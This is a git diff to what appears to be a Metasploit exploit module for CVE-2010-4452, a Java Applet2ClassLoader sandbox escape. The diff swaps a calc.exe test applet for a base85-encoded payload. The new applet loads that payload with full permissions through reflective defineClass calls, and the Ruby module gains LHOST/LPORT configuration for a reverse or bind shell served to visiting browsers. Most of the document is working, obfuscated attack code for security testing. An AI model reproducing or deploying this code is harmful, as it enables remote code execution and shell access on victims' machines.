diff --git a/data/exploits/cve-2010-4452/AppletX.class b/data/exploits/cve-2010-4452/AppletX.class index 855971ad98..1d68a81854 100644 Binary files a/data/exploits/cve-2010-4452/AppletX.class and b/data/exploits/cve-2010-4452/AppletX.class differ diff --git a/external/source/exploits/cve-2010-4452/AppletX.java b/external/source/exploits/cve-2010-4452/AppletX.java index 14c67da29c..76bd8cc245 100644 --- a/external/source/exploits/cve-2010-4452/AppletX.java +++ b/external/source/exploits/cve-2010-4452/AppletX.java @@ -1,19 +1,198 @@ public class AppletX extends java.applet.Applet { + @SuppressWarnings("unchecked") public void init() { - Process p = null; - System.out.println( "Executing" ); - try { - p = Runtime.getRuntime().exec( "calc.exe" ); - if( p == null ) - { - System.out.println( "Null process, crap" ); - } - p.waitFor(); +String CONFIG = "CONFIGZZ"; +String DATA = ("`f1J@mS#$,D@%=S:g##d<]4%ovA#$*Wc&;'sg4wlnv#%djF+A<**#$*c" + + "g%Yk%,##dWf+A<*.##mci+A<-1#$*um%?1?v#$+&o&AT0B;0Lh#I/Ek7w:#l7w32Y;NG1V#G4qaB=nXVB=hv/B=L=C##00`#EDwnCUjm" + + "XG/%J2HF7~2#Jac>Gc_cc.`Gi?I'%.~B=K4v=`A#pFL?/7(JFkGI'%.~B=KV,8UG*kH+ve" + + "-%nlwhHFeC(Dnor$$qp]8Dn9YK##.;,E0r&)26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlml" + + "u8>ePj>]iB@8PfCk#I.g]DjV&=H^~NeGd1_uEiriR&53,>CThuTFgZ>6##fTa),((3=MSL" + + "aHb4@68$QRJGed8&#Iw9X;KO?kB>S)qFKKA9HClk,D7XH*E0r)>26D&6:O@#tHGORACVFn" + + "m#D[0.Ej#[N._g&:/o^kqI'%.~B=KV,=aOf&FL?/7;KY(;B>S)qFKKA9EfVli6,.KQ=]PN" + + ",Bte`3Ej~BO&PN5?C9;EOE-cQ>&v6>h2,$nOE,5MY26D&6D7X/qB=L>.vw#'']U/5-J" + + "V#$=r1&o@Vr-VPXd#,D62$;:K,FL>PtE*Erk#B0Zk;Pt13B>S)" + + "qFKKA8HClh+D7XH*1e~=C#$#$>28%BKQ" + + "?#$>;;#Hn-?CUjpYG/%J2HF7~2HEC_6&vM@ECeSDDE+f5U26D&68:,9m8$R0bJ#vb8Hb=6" + + "kGed8'&wMGcD+l9[F(>8TH*)2'DnBi.B:LX#B=hv/Ej%+0#JY>lB=8IWDgPp>6(JFkNB>A)vFguD8;LS)qFKKA9EfVli;SR:bCTq6h),((TB>S)" + + "qFKKA9IZZ:wHFvh&#J+ikFg;6UF0/3]),((GB>S)qFKKA9DP/YvB>~Z3#I/*XCU4@OH*L)" + + "hCU7Ho/mnZ`B=:KdEdM6A27%24Dn^=q#DZs5;KNXWB>S)qFKKA9HClk,D7XH*#GNZ406@:" + + "w&PN50DmErgEfXeQ#JY>l;KPK6B>S)qFKKA9HClk,D7XH*:QAYEB=:L/H$`uHGemn)28s[" + + "THFn3tDnoktFc^L_FL>PtE0r)>26D&6D7X/qB=LS)" + + "qFKKA9HClk,D7XH*E0sjp26D&6D7X/qB=LS)qHEh@E;P$mF&ki=kB>S)qHEh@E;P$mFF]JK" + + "H=h81eBS)qFKKA9BU^ZkHEUnu#Grr8@<;ZV#,3Q:#%dj^####>#%djB#&+'" + + "~#&4-B##5/%#%djQ#&+'_#&4-B##5/%#$q:M#&O?d#$q:5#&O?f##kS+#&jQj#&sWI####" + + "###,)'#'0cp#'9iM#.jk=##G;.0TuK?0N%o`%8=0a#6?E01JK?.1(#U=(f^SJ#71ND~5-7" + + "=#87ML^0)(_~YTd>#4i7,&koT='hl'<#71N;#>~K;(JM9>##);,02)CM*)$?9###2($;;1" + + "<%nmaB'MK?^Q##$FK#u$dk###,&0m5`a;dKJ:%SXl" + + "s),.Jn)I=s%T4%a3#6tcC~oq4q#6P37(jE3()bd~~_-6p20VoOg]i4wB#Q,BA[S9L(###/" + + "'5thbl'hfKK5tiM,.SL^`5tj7A5>2qu5tj=C#>>w=##$IL&54QW,>8)@,YSDG,tnYL-;4q" + + "R-VP@~-qkmi.82>2&##$IL#>>>**_ZQ;##$=H#>>,$##$^S2bX9V`f1J@m" + + "S#$0Yd%MSo`##iWII7swo#$/oN&JtLRdnHTA&K1XXdnBvM#+km*ek?Av#+km+fLuQ$#$:k" + + "9F%crh#$02V&Kh(4gIr#Z&L%3ah+S5~&L7?chb7lj##bM4iCjV9##sA]j@fk=##bM4jwH." + + "C#$0~d&M='BktD=c%kmum#$0hh&Ma?5m7~[,&MsJrmn=m.&N0VudS(ff&N9~vnk:31#&O?" + + "N-VOn<##swop.P``#'KuWiCjVP#$1:u&O-8Ki_1h*&O6>*qb.5u#=8E$r_*Sp&Oc~/s@cH" + + "q&Ouh1swJGl#=wo+t=]5*##YD(#####&KD$Z#>G2&#AjHO###2*######?55;$;Ce3%oE@" + + ":%8@%2#>tS4%nv:<#ESpr&PWL@#Ef't9M>e*#$)1;&L[XPtY%?f#ESpr'hnpH%U9$D#?2:" + + ">;G7F6#$)CA&7>O9)biw0&7PZKdnE~D&7Y`M*_fR:&7klN+AGp@&8)#PdnEnJ&82)QdnEt" + + "L#GhE2,Y~Mf%;PuQ#?2gMAkWPY#?/iMAP&u8=wpbU#CZY`3(s[_#$+c/&>K8b?;31Y#CZY`3(s[c#?4l2$r%):#?>#" + + "5&?5c?APFp`#G1v+B2&ZC#G1v+Bh~lG%^5tC#?,2<%86f<<3&rs#E_`ME0q8A26D&6D7X/" + + "qGed776*kIH<`B''AX$/`#Fn5b=d91p?Bmge?qgW*:Jq0sS)qFKKA9EfVli6,.KQ=]GH+DSU/=Bsi&" + + "tBk[QOH+ve-I'%.4FgWL,HEBSaG.L8WHCo<*F00#tBk@?LH+ve-I'%.4FgWL,HGNC+=ho1" + + "&B/DuE0qow.]mm+D7X/qGed7,#IA$;:K" + + "8FL>Pt/n+fbB=:LAEdM6A27%24Dn^=q08F2]&53,/CThuTFgZ>6#?,]b%nm#?HFn+.B>/K" + + "4=~Jk=B=:KcDgPp>FHnN$=ho1&BS)qFKKA9HClk,D7XH*#GNZ4CU4RUCVEEdBsDoTBWZC&##/[KE0r&" + + "(26D&6D7X/qGed776*kIHB=:KdEdM6A27%24Dn^=q#DZs5C97nJHGi7dDng2)##/vWFL>^" + + "j8wIU.##0-UE0r&626D&6D7X/qGed776*kIHI'%.~B=KV,=aOf&FL?/7;KY(;B>S)q27mR" + + "ZCUe)O%nlwhF1uS6J@04*-qjZVB=:KcEdM6A27%24Dn^=q08F2]I'%.~FgWm7Ej~An##.1" + + "oH*q0kHEUo)/opwsI'%.~B=KV,=aOf&FL?/7@S)qFKKA9HClk,D7XH*E0r)>26D&6D7X/qB=L,##/vWI'%..B=KV,<-r8vB=L=" + + "NCQNV^Hb2b_G`cOX'#&;.E(t%N#QFd9~P*FN##2I.I'%.$HGM8HDiucq#?YQW#IXZiC3fwd##0-UHEh=#EkHJ*1r*hI'#7q" + + "iMbUN]#LWWbN_Kr@##0_S##-aTI'%.(FgWm7Ej~AnHGNCl=ho1&B-v?&ki:0Ptd9C'&3LrQq`]IE*NBI26D&6D7X/qGed77#IA<~#RLMIBmC%" + + "hH+ve-DST]'#N#PoRnX.U#N>brSkTX`#?-snTM5jd#?[Hw#QOkuu^'(5l2X%fBo#P%n-+%u_:B>S)qDnpLPHClk1D7XH*CU~5bCW:)0&PN5" + + "LElDIe-Epq##AbuIHCk^O>0C~P*EX#?[p/'(uA/E(vB;F'~iNH*)2" + + "'DnBi.B:LX#B=hv/'2/G@CT_NHC9_<`D67o^^e>0O##2^5I'%.'FgWm7HEBSlG.L8WHCo<" + + "*F00#t#QFd9+%u^]B>S)qBsD`9HF7e>CRd',H*qM5FLu83+~Vp]B>S)qBsD`9HF7e>EfDa" + + "$Gd1)bH+w(6&wVwvZV@N*E,#AW26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlmlu*_ZUUB>S)" + + "qBsD`9HF7e>FcS3)Fe<6ZCThd)E***E26D&628EeE#FJDmDmBXP225~^##-b-I'%..CVMO" + + "7Dn^A-BmY-N28F7IHG3s]BshQj&vZPjZq[l1#QFd9[S72;#?[v1')hq?~kTM8#QXs<(eau" + + "BB>S)qElDJ01pCE1D67p)#?WUn#Qt2@HG9Ve#JbAlB=8=SEdM6A27%24H*(nR[S.+S##27" + + "(I'%.'FgWj6HEBSkG.L8WHCo<*F00#t#5nO6)GC2S)q1qRIXG//6wHCo<*F00#t#5wU" + + "7),();B=:LAEdD0@1p_)3Dn^=q&r1,@^eM@DE*NBI26D&6D7X/qE3;un%DZJg#?~TB#RLP" + + "JB=8IWEdM6A27%24FhVOlEiriu),((GB>S)q27mRZFL?.hGed8'&wMGc`(dRA#R^ZFY=oB" + + "D#$@m/#P.s#H$]Ws`Cp]W##2m:Dlt`w`(UT~#$AQB#PJ0%CO-+e#$>Hb'+P$^M+tfjE*E<" + + "H26D&6Ej^#8B>@H&#$>ZS'+b0ba~BWV#7poJb=rEH##0_S#?WT_#SR7^1jT4,',1IUYYE5" + + "D#SmGQd7k&_#?]2S',^hmeP4=n#J0wKf1c](#?]DY'-I?.geH='#U9@^hFwF^#?]Y`'.*c" + + "2KMBowF]/9EB=]_?#?YQX%LE-`#?]_b'.Eu@j~=T9#4_b+'MJQ/DST]'G-Q+EHED4w#$>o" + + "f#P.rtDlj+F#>>0H%nlwhB>S)qF1Z+A)b^:IB>S)qFKKA9EfVli;SR:bCTq6h),((TB>S)" + + "qFKKA9IZZ:wHFvh&#J+ikFg;6UF0/3]&53,>;nut~B>8N&##/[F;KXC*B>S)qFKKA9HClk" + + ",D7XH*)b^9tB=:KcEdM6A27%24Dn^=q08F2]%86f,<5<(]#I/-XCVC$WBru3o*)$CJ098J" + + "PI'%.~B=KV,=aOf&FL?/7##.1qG._6k#I&*~;KOHnB>S)qFKKA9HClk,D7XH*E0r)>26D&" + + "6D7X/qGed778@*3OCU.Qu##.2'=hAcbFL?/7),((I=MSLaHb4@68$QRJGed8&#Iw9X;KO?" + + "kB>S)qFKKA9HClk,D7XH*E0r)>26D&6:O@#tHGORACVFnm#D[0.FgqQX##/X?E0r%o26D&" + + "6:O@#tHGORACVFnm08FDV),((8B>S)q27mRZHb=6kGed8'#Iw9XEj#XM#I/?lCU4CPFhU~" + + "tHG3t54wkw+B=:KcEdM6A27%24Dn^=q;MSo+B>S)qFKKA9HClk,D7XH*E0r)>26D&6D7X/" + + "qGed776*kIHE*WHJ26D&6D7X/qHFc~)Gd1nrG#SHGCVOo%#Jb5P;KNXWB>S)qFKKA9HClk" + + ",D7XH*#F-a'B>OmWS)qFKKA9HClk,D7XH*&PN4jS)qFKKA9HClk,D7XH*B=:KvEdM6A27%24Dn^=q08F2]I'%.~B=KV,-W1]9Y>5W#I/*_CTmwHCVXN$/l)IO##/9RHEh*sFh_CTCVY)4DST~~/oL_" + + "oI'%.~FgWm7Ej~AnE0r`%26D&6D7X/qGed776*kIH##/-NHEh*qCVF5WDj#4`##/[K;KXC" + + "&B>S)q27mRZCUe)O$qp~eDm4#t##00_E0r%h26D&69RC]q6*Y7D##/-NBS)q27mRZG//6wHCo<*F00#tB=:K" + + "vEdM6A27%24Dn^=q08F2](JFk6B>S)qFKKA9H_)n,F1$,2&53,>=MSLaDnp8:##/[L;KXC" + + "+B>S)qFKKA9H_)n,F1$,2##.1oCW'dj/kc;ZE0sj]26D&6D7X/qGed776*kIHB=:KdEdM6" + + "A27%24BtJDc6,.KUE*WHJ26D&6D7X/qFhU~/H+vq(D-?pDFHps_=ho1&B)c(/+bSB>S)qFKKA9IwJC1F0Ti3Db^::)b^:" + + "RI'%.~FgWm7G.L8%HCo<*F00#t#ttAb#JbK(E0qAD26D&6S)qFKKA9HClk,D7XH*>]iW'/l2OP#GNZBBrqSCHFvh&/meT_B=:KdFF.HC=aP8*CU[f" + + "q##.2)HEh*sG//6wHCo<*F00#t/n=rdB=:KdDgPp>H^c~1HGORGCVFnm#D[0.;KO9iB>S)" + + "qFKKA9HClk,D7XH*B=:KvEdM6A27%24Dn^=q08F2]&PN50FMVn/EP#2q#JY/k06@:w%nlw" + + "vHGjC9CU~5b#ttB@#I%aN;KNp_B>S)qBsD`9HF7e>CRd',H*qM5FLu83#GNZ4;KOZtB>S)" + + "qHEh@E;P$mFE0sjp26D&6H`q#*J&#dBGd1b8CQC-oCpeB/HEC~p>]i-C/r]j8I'%.~CVMO" + + "7Dn^A-8UGa.=g;MZBte`3E0r`%26D&6H`q#*J&#dBGd1)%H+w(68~/iXCUe3&FgZ>)>]i-" + + "LGZ+TH:Tw9B##03~BdkC##/-NCp@M^8[30NH+ve-/sQE@I'%.~B=KV" + + ",=aOf&FL?/78>ePcE0s4l26D&6H`q#*J&#dBFhU~/HEUo*8wJrYDlmlu;KY(BB>S)qFKKA" + + "9EfVli6,.KQGZXrMEk?D-EfXeY#JY>l;KNUVB>S)qFKKA9EfVli6,.KQ##/-NIBd[$HG=?" + + "mCThWf/mnZ`B=:KdEdM6A27%24CUR]O#D[E7CU4=NHEg2i#I&-`;KP0-B>S)qFKKA9HClk" + + ",D7XH*E0sjp26D&6D7X/qB=L.7wRCTh0j/n=rdI'%.~FgWm7Dn]&)HCo<#F00#t#GNZ4I^')" + + "~H,+L=G#/0C#IJQu;KO6hB>S)qFKKA9BU^ZkHEUnuE0r)>26D&6D7X/qE3;un6,6vFGuXi" + + "KGcbqwGe8(0DHQsDFd[<_FeES)qDnpLPCSEK%Ge8(2Gu+KF#I/TmFh@f['2/GLB=qg#FhhG0B=(%M#>>0B+~Vp" + + "-;KY?YB>S)qFKKA9HClk,D7XH*CpJ2R#D[?7Ej5pSFKo~t#J`XN:NR=TB=:KdEdM6A27%2" + + "4CUR]O#D[E7;KOHnB>S)qFKKA9BU^ZkHEUnuE0r)>26D&6D7X/qGed778@*3OCU.Qu##.2" + + "'C:~+fCn#[a/l2OP#F-a5HbTkjGeeC5#IA8##.[AI'%-" + + "uHGM8H;L<5tEiiin%86f;;NjkJ#F&/^E0q8A26D&6Ej^#8BtI&q6*Y7wa6M,[ML-5~gB5]M]VT_4r," + + "V_5/;Y]ql-@$tTlO]P[`].:*Qh]NbIK#6PTB_,ECD+/L,a]l=Zn%Yc<6?YofY]m0j(%u)E" + + "7#6G3Q/ki^)#6ufb#6S+@]QFiw]Qk&l#6GH?)GISU#6tU#%qSms5^*5@#$_aO&r$].&nMD" + + "k?[)S_V+qJ]&S2MW)c$l`1JG5i+>j,w1eb>h?ZlGb#6P6Q0ipDi2-pZ3+++)#1eb>h%=J6" + + "i?[_wl^4-c$?_9/Y=b.2l%:o^L=`+6O]QaXe]Uo[;'S~ML#6GBV*)*f'#6GBV*)*f(^4cQ" + + ")_c&X#$)JeK?_7XG]N#hU?_8]L=]?8G%:oaM#vTHm(1@c9W&V`&E)cww(`)dgg+(#$G+'97h=A6/6#?ZY]_DhMr]qnY2%V8UC(j?:" + + "-#6Fq0]iQ(m#5qS+########%1##,)(#$q]VkiC#6wO<#6wDA#6wDBB3n`P$*F:@]rqGQ%:s'R5d:>%#88[" + + "u]MTQ1%t~Cs%gWJ[$Y9[0#6G6R#BhT5)c$f^]MobY5c&-tDbRTI#6G'M)c~f3hFjDL_.Nc" + + "L]ql-@E*`uW1L'ql]NbIK#6YZC+&Y.(ED3fK$tTa0_bt;e$)MKBc+3oaF^>S^?WR7@XgwN" + + "B#5wg1$Dg~Bc+F&cG?te`?WR7@Xh4ZD#5wg1$`-eEc+X2eGvUwb?WR7@XhFfF#5wg1#6Ii" + + "J$rn1j?blaZ=]$&B=a1(U$=sCIHq^uN(egj4$Y9L+?c2s[In[>+~&JF[###&$$V^~,##'5" + + "E##)O1#>>8(&59W<_b@^H]1`6/?q^Q(#YY;'<(m9q#6%;#,>=NU?W[=D~6/hE#6K9V]ZCe" + + "$#6GH?#6ZMmc$)k6#6u8Q#6S+@JkWI_(gI(Q(/20i0O=bk;T~wQ%SXlr-qq('#6ZOa##)8" + + "T&53(-_b@dJ]1`6/0h_RN#>>2&,tn;B?W[=D0NeDg~6K%G#3CD>Xj.Pg2-pGi]NbIK#5f*" + + ";######7CNB##,+:###%.##G;Y####'#6ZN,<)$*CMG1I5_.kKn#5g'O######7UZD##,+<###%.##G=6####)MbLbgN(g^e#6ZNR13ZIO#6HYd#6w>" + + "i$@#^NO%cj<<1Et$OA**<1QMP-5b7uf+4h-3Ow`;jX~o/jP?vNW#6G$L+wwEePYAN>&ko$" + + ",?YofY.SR=)#6HF`#4kp~$=t_u?.8ld_?g2C]ql-@$AJvn)c8Lv#6HD_.SQT#W_`k;$=sW" + + "L]~EMr+/=s%$XkPl]~WZ#MPHA=u1.n&-VV0/]MKKP#6PTB##)7M&53(-awT]V]1`6/%nv%" + + "-%SQw/t=~hv6JMSM+aXcR(0^eN#6GjQ;b]nv]S6uN,Dq^h~C(BP#3CD>Al'N%$$HH5#6G$" + + "H]QR$<$~jsN?W[=D10FVi+^>$Z]~NSw+.3aF3`$Pu&58a>Al&VK)c6V:_,*$r]ql-@%#,3" + + "p%=w_$$Y9Q]/ki#W%:KE]#4*:h)c7Jd3j8`q'MP-A$Y9N`]RU6*MPH;;u1.n(]M]Y%Xd9Z" + + "(]QR.UW_f$c$?eX;+liY80S0<$#6G'O0Mj[v$;_I[T1l])$=O'v'hkE1$=O$i#6J:>$;@A" + + "d13QBF]]0#(Xd>J[#6#'8$?f/(;<@lj3)$wm=a1%T=`sqS###%)##kS+#8.%Z#6=g0#'']" + + "I##5/(0O=`_[S6c8#u%t.#6HE^$V~$9##,+9##G;'##5/*#5~C(######87)H##,+.###%" + + ".##5/f#####^?6,i#6(,rUeJ5k(v_23U.i)n(vq>5V+e2m~_$oo#6&sQ]^HL1#60Wc^@2c" + + "i#612s##);Q#####").replace('~', '\\'); +byte[] payload = new byte[9132]; +for (int i = 0; i < DATA.length()/5; i++) { + long val=0; + for (int j = 0; j < 5; j++) val = val * 85 + (DATA.charAt(i*5+j)-'#'); + for (int j = 0; j < 4; j++, val >>= 8) payload[i*4+j] = (byte)val; +} +Class I = int.class, BA = byte[].class; +Class PD = java.security.ProtectionDomain.class; +final java.security.Permissions permissions = new java.security.Permissions(); +permissions.add(new java.security.AllPermission()); +final java.security.ProtectionDomain pd = new java.security.ProtectionDomain(new + java.security.CodeSource(new java.net.URL("file:///"), + new java.security.cert.Certificate[0]), permissions); +java.lang.reflect.Method m = ClassLoader.class.getDeclaredMethod("defineClass", + new Class[] {String.class, BA, I, I, PD}); +m.setAccessible(true); +Class c = (Class) m.invoke(new java.net.URLClassLoader(new java.net.URL[0]), + new Object[] {null, payload, new Integer(0), new Integer(1888), pd}); +byte[] payload2 = new byte[7244]; +System.arraycopy(payload, 1888, payload2, 0, 7244); +c.getConstructor(new Class[] {PD, BA, BA}) + .newInstance(new Object[] {pd, CONFIG.getBytes(), payload2}); } catch( Exception e ) { diff --git a/external/source/exploits/cve-2010-4452/get_offsets.rb b/external/source/exploits/cve-2010-4452/get_offsets.rb index 7278f34bf1..8b134e965b 100755 --- a/external/source/exploits/cve-2010-4452/get_offsets.rb +++ b/external/source/exploits/cve-2010-4452/get_offsets.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby +dat = nil dat = File.open(ARGV[0], 'rb') { |fd| fd.read } - -puts "cmd_off = 0x%x" % dat.index("\x00\x08calc.exe") -puts "cn_off = 0x%x" % dat.index("\x00\x07AppletX") +if dat + puts "config_off = 0x%x" % dat.index("\x00\x08CONFIGZZ") + puts "cn_off = 0x%x" % dat.index("\x00\x07AppletX") +else + "No data?!" +end diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index 8858de1a62..da029586db 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -21,12 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote super( update_info( info, 'Name' => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit', 'Description' => %q{ - This module exploits a vulnerability in Java Runtime Environment - that allows an attacker to escape the Java Sandbox. By supplying a - codebase that points at a trusted directory and a code that is a URL that - does not contain an dots an applet can run without the sandbox. + This module exploits a vulnerability in the Java Runtime Environment + that allows an attacker to run an applet outside of the Java Sandbox. When + an applet is invoked with: - The vulnerability affects version 6 prior to update 24. + 1. A "codebase" parameter that points at a trusted directory + 2. A "code" parameter that is a URL that does not contain any dots + + the applet will run outside of the sandbox. + + This vulnerability affects JRE prior to version 6 update 24. }, 'License' => MSF_LICENSE, 'Author' => [ @@ -42,13 +46,30 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ] ], - 'Platform' => [ 'java', 'win' ], - 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, + 'Platform' => [ 'java' ], #, 'win' ], + 'Payload' => + { + 'Space' => 20480, + 'BadChars' => '', + 'DisableNops' => true, + 'Compat' => + { + # bind doesn't make much sense for client sides + 'ConnectionType' => '-find -bind' + } + }, 'Targets' => [ # OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23 # FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23 - [ 'Automatic (no payload)', { } ] + [ 'Generic (Java Payload)', + { + 'Arch' => ARCH_JAVA, + 'Platform' => 'java', + } + ], + + # Native payloads aren't currently supported (only work with jar/war) =begin [ 'Windows x86', { @@ -56,12 +77,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', } ], - [ 'Generic (Java Payload)', - { - 'Arch' => ARCH_JAVA, - 'Platform' => 'java', - } - ], =end ], 'DefaultTarget' => 0, @@ -70,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('CMD', [ false, "Command to run.", "calc.exe"]), + # This is the default for a 32-bit Windows install OptString.new('LIBPATH', [ false, "The codebase path to use (privileged)", "C:\\Program Files\\java\\jre6\\lib\\ext"]), ], self.class) @@ -98,27 +113,37 @@ class Metasploit3 < Msf::Exploit::Remote # Do what get_uri does so that we can replace it in the string host = Rex::Socket.source_address(cli.peerhost) host_num = Rex::Socket.addr_aton(host).unpack('N').first - - codebase = "file:" + datastore['LIBPATH'] code_url = jpath.sub(host, host_num.to_s) - cmd = datastore['CMD'] - cmd_off = 0xb4 + codebase = "file:" + "C:\\Program Files (x86)\\java\\jre6\\lib\\ext" + codebase = "file:" + "C:\\Program Files\\java\\jre6\\lib\\ext" - cn_off = 0xfc + config = "Spawn=2\nLPORT=#{datastore['LPORT']}\n" + # The java payloads decide to be reverse if LHOST is set. + config << "LHOST=#{datastore['LHOST']}\n" if datastore['PAYLOAD'] =~ /reverse/ + config_off = 0x10e + + cn_off = 0x2f76 case request.uri when /\.class$/ + # NOTE: the payload for this module is implemented in the .class file directly. + # + # This is due to the following: + # 1. The file must be a single .class file + # 2. The class inside must derive from Applet + # + # As such, we do not use the traditional payload generation facilities. #p = regenerate_payload(cli) print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...") cls = @java_class.dup - cls[cmd_off,2] = [cmd.length].pack('n') - cls[cmd_off+2,8] = cmd + cls[config_off,2] = [config.length].pack('n') + cls[config_off+2,8] = config - cn_off += (cmd.length - 8) # the original length was 8 (calc.exe) + cn_off += (config.length - 8) # the original length was 8 (CONFIGZZ) cls[cn_off,2] = [code_url.length].pack('n') cls[cn_off+2,7] = code_url @@ -137,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote EOS print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, html) - handler(cli) end end